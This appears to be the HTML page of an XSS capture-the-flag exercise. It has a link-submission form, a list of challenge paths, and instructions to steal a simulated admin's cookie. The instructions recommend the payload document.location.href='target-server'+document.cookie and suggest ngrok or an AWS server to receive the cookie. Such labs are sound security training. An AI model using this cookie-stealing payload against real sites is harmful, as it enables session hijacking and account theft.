    <div class="container">
        <h1>Welcome to the phishing link submission system. Took me a while to build this.</h1>

        <form action="" method="post">
    		<p>
    	    	<label for="url">URL</label>
        		<input type=text" name="url">
	        </p>
        	<p>
            	<input type="submit">
	        </p>
        </form>

              Try to steal the admin's cookie by sending out the links through the submission system. Admin will click on it once you submitted them. Send the cookie back to your server. You can get a free AWS server if you need one or you can just use ngrok to turn your laptop into a public http server. The admin is using Firefox, you don't have to worry about bypassing Chrome XSS Auditor. Will recommend to use document.location.href="target-server"+document.cookie to get the cookie. 

        <pre>Challenges 
        Demo: 	/demo 
        XSS1: 	/xss1
        XSS2: 	/xss2
        XSS3: 	/xss3
        Extra:	 /fun
	    </pre>
        Report bugs to strayapanda[at]gmail.com
    </div>